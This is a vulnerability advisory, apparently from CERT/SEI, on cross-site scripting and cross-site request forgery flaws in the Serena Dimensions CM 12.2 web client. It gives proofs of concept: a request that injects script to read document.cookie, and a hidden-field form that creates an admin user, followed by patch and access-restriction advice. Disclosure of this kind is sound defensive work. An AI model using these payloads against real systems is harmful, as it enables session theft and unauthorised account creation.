Software Engineering Institute

Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contains multiple cross-site scripting vulnerabilities.

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2014-0335

#Unauthenticated vulnerable parameters
/dimensions/ [DB_CONN parameter]
/dimensions/ [DB_NAME parameter]
/dimensions/ [DM_HOST parameter]
/dimensions/ [MAN_DB_NAME parameter]

#Authenticated vulnerable parameters
/dimensions/ [framecmd parameter]
/dimensions/ [identifier parameter]
/dimensions/ [identifier parameter]
/dimensions/ [merant.adm.adapters.AdmDialogPropertyMgr parameter]
/dimensions/ [nav_frame parameter]
/dimensions/ [nav_jsp parameter]
/dimensions/ [target_frame parameter]
/dimensions/ [id parameter]
/dimensions/ [type parameter]

Proof-of-Concept:
GET /dimensions/?jsp=login&USER_ID=sa_dmsys&PASSWORD=D%21m3nsions&SYSTEM_DEFINITIONS=0&FORWARD_TARGET=jsp%25253dlogin&MAN_DB_NAME=2f<%2fscript><script>alert(document.cookie)<%2fscript>207&MAN_DB_CONN=&MAN_DM_HOST=&DM_HOST=TEST1&DB_NAME=TEST2&DB_CONN=TEST3&apiConnDetails=&MENU_SET=Default HTTP/1.1


CWE-352: Cross-Site Request Forgery (CSRF) - CVE-2014-0336

Proof-of-Concept:
<html>

<!-- CSRF PoC -->

<body>

<form
action="http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.
User&create=yes" method="POST">
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;dept" value= />
<input type="hidden" name="&#45;AdmAttrNames&#46;id" value="HACKTEST1" />
<input type="hidden" name="USER&#95;CURWORKSET" value="&#37;24GENERIC&#37;3a&#37;24GLOBAL" />

<input type="hidden" name="isUserEdit" value="false" />
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;site" value= />
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;phone" value= />
<input type="hidden" name="AUTOMATIC&#95;LOGIN" value= />
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;group&#95;id" value= />
<input type="hidden" name="null" value= />
<input type="hidden" name="DIALOG&#95;MODE" value="MODE&#37;5fCREATE" />
<input type="hidden" name="&#45;AdmAttrNames&#46;user&#95;full&#95;name" value="HACKTEST1" />

<input type="hidden" name="projectPicker" value="&#37;24GENERIC&#37;3a&#37;24GLOBAL" />
<input type="hidden" name="wait&#95;until&#95;loaded" value= />
<input type="hidden" name="projectPickerUid" value="1" />
<input type="hidden" name="GROUPS&#95;ASSIGNED" value= />
<input type="hidden" name="&#45;AdmAttrNames&#46;email"
value="ken1&#37;2ecijsouw&#37;40sincerus&#37;2enl" />

<input type="submit" value="Submit request" />
</form>
</body>

A remote unauthenticated attacker may be able to execute arbitrary script in the context of the end-user's browser session.

Apply an update

The vendor has addressed these issues in version 14.1. Users are encouraged to update to the latest release.

Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS attacks since the attack comes as an HTTP request from a legitimate user's host. Restricting access would prevent an attacker from accessing the interface using stolen credentials from a blocked network location.